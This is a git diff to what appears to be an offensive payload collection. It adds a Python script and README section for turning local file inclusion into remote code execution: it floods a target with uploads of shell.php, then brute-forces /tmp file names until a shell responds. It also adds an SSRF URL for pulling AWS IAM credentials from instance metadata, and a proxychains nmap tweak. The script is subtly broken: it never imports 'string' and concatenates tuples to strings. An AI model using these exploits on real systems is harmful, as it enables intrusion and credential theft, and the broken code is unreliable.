diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md
index 8a51ec6..f5b936c 100644
--- a/File Inclusion - Path Traversal/README.md	
+++ b/File Inclusion - Path Traversal/README.md	
@@ -16,6 +16,7 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
 * [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
 * [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
 * [LFI to RCE via upload](#lfi-to-rce-via-upload)
+* [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race)
 * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)
 * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
 * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
@@ -243,6 +244,38 @@ http://example.com/index.php?page=path/to/uploaded/file.png
 
 In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf
 
+## LFI to RCE via upload (race)
+
+* Upload a file and trigger a self-inclusion.
+* Repeat 1 a shitload of time to:
+* increase our odds of winning the race
+* increase our guessing odds
+* Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6}
+* Enjoy our shell.
+
+```python
+import itertools
+import requests
+import sys
+
+print('[+] Trying to win the race')
+f = {'file': open('shell.php', 'rb')}
+for _ in range(4096 * 4096):
+    requests.post('http://target.com/index.php?c=index.php', f)
+
+
+print('[+] Bruteforcing the inclusion')
+for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
+    url = 'http://target.com/index.php?c=/tmp/php' + fname
+    r = requests.get(url)
+    if 'load average' in r.text:  # <?php echo system('uptime');
+        print('[+] We have got a shell: ' + url)
+        sys.exit(0)
+
+print('[x] Something went wrong, please try again')
+```
+
+
 ## LFI to RCE via phpinfo()
 
 https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
diff --git a/File Inclusion - Path Traversal/uploadlfi.py b/File Inclusion - Path Traversal/uploadlfi.py
new file mode 100644
index 0000000..ed3e90b
--- /dev/null
+++ b/File Inclusion - Path Traversal/uploadlfi.py	
@@ -0,0 +1,19 @@
+import itertools
+import requests
+import sys
+
+print('[+] Trying to win the race')
+f = {'file': open('shell.php', 'rb')}
+for _ in range(4096 * 4096):
+    requests.post('http://target.com/index.php?c=index.php', f)
+
+
+print('[+] Bruteforcing the inclusion')
+for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
+    url = 'http://target.com/index.php?c=/tmp/php' + fname
+    r = requests.get(url)
+    if 'load average' in r.text:  # <?php echo system('uptime');
+        print('[+] We have got a shell: ' + url)
+        sys.exit(0)
+
+print('[x] Something went wrong, please try again')
\ No newline at end of file
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 8fcc527..0d3f7ac 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md	
+++ b/Methodology and Resources/Network Pivoting Techniques.md	
@@ -46,7 +46,7 @@ ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
 socks4 localhost 8080
 ```
 
-Set the SOCKS4 proxy then `proxychains nmap 192.168.5.6`
+Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
 
 ## Web SOCKS - reGeorg
 
diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index 0cd288a..17707b5 100644
--- a/SSRF injection/README.md	
+++ b/SSRF injection/README.md	
@@ -318,6 +318,7 @@ http://169.254.169.254/latest/meta-data/hostname
 http://169.254.169.254/latest/meta-data/public-keys/
 http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
 http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
+http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
 ```
 
 ### SSRF URL for Google Cloud